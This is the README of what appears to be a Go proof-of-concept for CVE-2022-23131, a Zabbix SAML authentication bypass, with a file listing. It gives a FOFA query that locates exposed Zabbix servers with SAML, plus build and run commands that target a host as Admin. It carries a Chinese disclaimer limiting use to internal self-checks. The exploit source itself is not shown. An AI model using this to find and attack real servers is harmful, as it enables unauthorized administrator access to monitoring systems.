cve-2022-23131 exp# zabbix-saml-bypass-poc
cve-2022-23131
本程序仅供甲方企业用户人员内部风险自查使用,禁止用于任何形式的未授权安全测试。
```
fofa: app="ZABBIX-监控系统" && body="saml"
```
使用方法:
```
go build -o zexp
chmod a+x zexp
./zexp check -t https://x.x.x.x/index.php -u Admin
```
截图:


[4.0K] /data/pocs/5e4f4105d4174120659ebbf58f598655e680b563
├── [4.0K] docs
│ ├── [124K] image-20220218164224691.png
│ ├── [228K] image-20220218164332289.png
│ ├── [ 68K] image-20220221122155042.png
│ └── [ 68K] image-20220221122233215.png
├── [ 845] go.mod
├── [4.8K] go.sum
├── [1.0K] LICENSE
├── [3.9K] main.go
└── [ 465] README.md
1 directory, 9 files